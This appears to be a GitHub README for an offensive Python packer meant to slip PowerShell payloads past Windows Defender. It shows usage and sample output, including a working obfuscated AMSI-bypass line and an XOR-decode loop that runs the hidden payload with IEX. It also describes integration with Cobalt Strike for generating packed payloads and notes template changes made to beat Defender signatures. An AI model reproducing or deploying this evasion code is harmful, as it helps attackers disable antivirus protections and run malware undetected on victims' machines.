A simple python packer to easily bypass Windows Defender
Basic usage
# python FuckThatPacker.py --help
___ _ _____ _ _ ___ _
| __| _ __| |_|_ _| |_ __ _| |_| _ \__ _ __| |_____ _ _
| _| || / _| / / | | | ' \/ _` | _| _/ _` / _| / / -_) '_|
|_| \_,_\__|_\_\ |_| |_||_\__,_|\__|_| \__,_\__|_\_\___|_|
Written with <3 by Unknow101/inf0sec
usage: FuckThatPacker.py [-h] -k KEY -p PAYLOAD [-o OUTPUT]
optional arguments:
-h, --help show this help message and exit
-k KEY, --key KEY integer key use of XOR operation
-p PAYLOAD, --payload PAYLOAD
path of the payload to pack
-o OUTPUT, --output OUTPUT
output payload into file
Basic generation of xor payload :
# python FuckThatPacker.py -k 32 -p /root/payload.ps1
___ _ _____ _ _ ___ _
| __| _ __| |_|_ _| |_ __ _| |_| _ \__ _ __| |_____ _ _
| _| || / _| / / | | | ' \/ _` | _| _/ _` / _| / / -_) '_|
|_| \_,_\__|_\_\ |_| |_||_\__,_|\__|_| \__,_\__|_\_\___|_|
Written with <3 by Unknow101/inf0sec
[+] Encode UTF16-LE
[+] Cyphering Payload ...
[+] Base64 Payload
[+] Writting into Template
[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType(("{5}{2}{0}{1}{3}{6}{4}" -f 'ut',('oma'+'t'+'ion.'),'.A',('Ams'+'iUt'),'ls',('S'+'ystem.'+'Manage'+'men'+'t'),'i')).GetField(("{1}{2}{0}" -f ('Co'+'n'+'text'),('am'+'s'),'i'),[Reflection.BindingFlags]("{4}{2}{3}{0}{1}" -f('b'+'lic,Sta'+'ti'),'c','P','u',('N'+'on'))).GetValue($null),0x41414141)
$a = "395zIEUgVCANIHMgVCBS[...]iBdICog"
$b = [System.Convert]::FromBase64String($a)
for ($x = 0; $x -lt $b.Count; $x++) {
$b[$x] = $b[$x] -bxor 32
IEX ([System.Text.Encoding]::Unicode.GetString($b))
CobaltStrike Integration
17/03/2022 : FuckThatPacker is now integrated to CobaltStrike !
At this time, FuckThatPacker should be installed in /opt/Tools/FuckThatPacker (or you can manualy edit the aggressor script). After this, you have to load the CNA script into cobalt strike (help : https://trial.cobaltstrike.com/aggressor-script/index.html) You should have a new label under the attacks menu :
Then, you have to specify the listener, the key and the output :
The payload will be generated and packed :
AV Results
Patch Notes
13/11/2020 : Modifying template.txt for Defender signature :D